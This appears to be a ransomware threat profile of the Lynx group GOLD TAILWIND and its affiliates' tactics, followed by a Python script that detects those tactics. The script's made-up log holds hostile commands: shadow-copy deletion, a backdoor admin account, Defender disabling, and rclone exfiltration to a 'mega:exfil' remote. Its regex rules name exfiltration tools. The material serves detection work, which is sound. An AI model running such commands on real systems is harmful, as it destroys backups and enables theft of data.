GOLD TAILWIND
SUMMARY
GOLD TAILWIND is a cybercrime group that operates the Lynx Ransomware-as-a-Service (RaaS) scheme. It operates on the double extortion model: affiliates steal data from victims before encrypting systems, then demand a ransom for both decryption and non-publication of the stolen data. The group advertised for affiliates on an underground forum in August 2024, offering them an 80% share of any ransom payment. It had named its first victim on its leak site a month earlier and has listed victims at an average of around 20 a month since then.
Given the similarities between the INC and Lynx ransomware binaries, early third-party reporting suggested that Lynx might be a rebrand of the INC Ransom scheme operated by GOLD IONIC. However, Lynx emerged a few months after the source code for INC was offered for sale on an underground forum. It is likely that GOLD TAILWIND purchased the code to build Lynx, and the groups are otherwise unaffiliated; both continue to name victims on their respective leak sites.
As GOLD TAILWIND relies on affiliates to gain access to networks and deploy ransomware, CTU researchers have observed a variety of tools and tactics, techniques, and procedures (TTPs) used in Lynx ransomware deployments. Initial access has come from brute-forcing SSL VPN accounts or from initial access brokers (IABs). Affiliates have used legitimate remote monitoring and management (RMM) tools such as AnyDesk and SimpleHelp, and post-exploitation frameworks such as Cobalt Strike. They create their own administrator accounts for persistence and have used custom backdoors for command and control (C2).
Affiliates use off-the-shelf tools such as Advanced IP Scanner and the SoftPerfect Network Scanner for discovery and move laterally over remote desktop protocol (RDP) and server message block (SMB). For credential access, they have used Mimikatz and PowerShell scripts that scrape credentials from MSSQL databases. They evade defenses by disabling endpoint detection and response (EDR) and antivirus solutions, including Windows Defender. The 7-Zip archiver has been used to stage files before exfiltrating them with MEGAsync or Rclone.
Lynx ransomware is based on the source code for INC and has variants that can be used to encrypt files on Windows, Linux and VMware ESXi systems. It can be configured through command line arguments and, on deployment, deletes shadow copies, appends the .lynx extension to encrypted files, drops a ransom note called README.txt, and changes the desktop wallpaper to contain the same information.
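Detection logic for the affiliate tradecraft and the encryption artifacts described in the two passages above, as an added example that is not Secureworks code and not taken from any Lynx sample. It runs a handful of command-line rules over constructed process-creation records, clusters hits per host so that a lone vssadmin call from a backup job does not page anyone, and checks a constructed file listing for the .lynx extension paired with a README.txt note. The specific command lines (vssadmin, net user, Set-MpPreference, 7z, rclone), the executable names and the pipe-delimited log format are assumptions standing in for whatever a given affiliate actually ran and for real Sysmon EventID 1 or Windows 4688 telemetry.

```python
import re
from collections import defaultdict

# Constructed process-creation records: "<host>|<user>|<image>|<cmdline>".
# Assumption: real telemetry (Sysmon EventID 1, Windows 4688) carries the
# same fields under other names. None of this is real Lynx data.
SAMPLE_PROCESS_LOG = r"""
SRV-FS01|CORP\svc_backup|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet
SRV-FS01|CORP\svc_backup|C:\Windows\System32\net.exe|net user sysadm P@ssw0rd! /add
SRV-FS01|CORP\svc_backup|C:\Windows\System32\net.exe|net localgroup administrators sysadm /add
WS-0042|CORP\jdoe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c Set-MpPreference -DisableRealtimeMonitoring $true
SRV-FS01|CORP\svc_backup|C:\Program Files\7-Zip\7z.exe|7z.exe a -pInfected C:\Temp\finance.7z \\SRV-FS01\Finance
SRV-FS01|CORP\svc_backup|C:\Temp\rclone.exe|rclone.exe copy C:\Temp\finance.7z mega:exfil
WS-0042|CORP\jdoe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\jdoe\notes.txt
"""

# One rule per TTP named in the profile. The command lines are assumed common
# ways of performing each action, not ones the profile attributes to Lynx.
RULES = {
    "shadow_copy_deletion": re.compile(
        r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b", re.I),
    "local_account_created": re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "added_to_administrators": re.compile(
        r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "defender_tampering": re.compile(r"Set-MpPreference\b.*-Disable\w+", re.I),
    "staging_with_7zip": re.compile(r"\b7z[ag]?(?:\.exe)?\s+a\s", re.I),
    "exfil_tooling": re.compile(r"\b(?:rclone|megasync)(?:\.exe)?\b", re.I),
}


def scan_process_log(log: str) -> dict[str, list[tuple[str, str]]]:
    """Return {rule_name: [(host, cmdline), ...]} for every record matching a rule."""
    hits: dict[str, list[tuple[str, str]]] = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        host, _user, _image, cmdline = line.split("|", 3)
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits[name].append((host, cmdline))
    return dict(hits)


def triage_hosts(hits: dict[str, list[tuple[str, str]]], threshold: int = 3) -> dict[str, list[str]]:
    """Return hosts on which at least `threshold` distinct TTPs fired.

    A single shadow-copy deletion can be a backup job; shadow deletion plus a
    new local admin plus archiving and an exfil tool on one host is not.
    """
    per_host: dict[str, set[str]] = defaultdict(set)
    for rule, entries in hits.items():
        for host, _cmd in entries:
            per_host[host].add(rule)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= threshold}


# Constructed file listing after an assumed encryption run (Windows paths).
SAMPLE_FILE_LISTING = [
    r"\\SRV-FS01\Finance\2024\budget.xlsx.lynx",
    r"\\SRV-FS01\Finance\2024\README.txt",
    r"\\SRV-FS01\Finance\2023\ledger.docx.lynx",
    r"\\SRV-FS01\Finance\2023\README.txt",
    r"\\SRV-FS01\IT\README.txt",        # a lone README.txt is not a signal
    r"\\SRV-FS01\HR\handbook.pdf",
]


def find_encryption_artifacts(paths: list[str], ext: str = ".lynx", note: str = "README.txt") -> list[str]:
    """Return directories holding both `ext` files and a `note` file.

    README.txt alone is far too common to alert on; its pairing with the
    extension the profile describes is what makes the directory interesting.
    """
    enc_dirs: set[str] = set()
    note_dirs: set[str] = set()
    for p in paths:
        directory, _sep, name = p.rpartition("\\")
        if name.lower().endswith(ext.lower()):
            enc_dirs.add(directory)
        elif name.lower() == note.lower():
            note_dirs.add(directory)
    return sorted(enc_dirs & note_dirs)


if __name__ == "__main__":
    found = scan_process_log(SAMPLE_PROCESS_LOG)
    for rule, entries in found.items():
        for host, cmd in entries:
            print(f"[{rule}] {host}: {cmd}")
    print("Hosts with clustered TTPs:", triage_hosts(found))
    print("Directories with .lynx files and a note:", find_encryption_artifacts(SAMPLE_FILE_LISTING))
```

The threshold in triage_hosts is the knob worth tuning: on the constructed data the file server trips five rules while the workstation trips only the Defender rule, which on its own deserves a ticket rather than a page. Swapping the regexes for queries against your EDR's process table keeps the same per-host clustering idea.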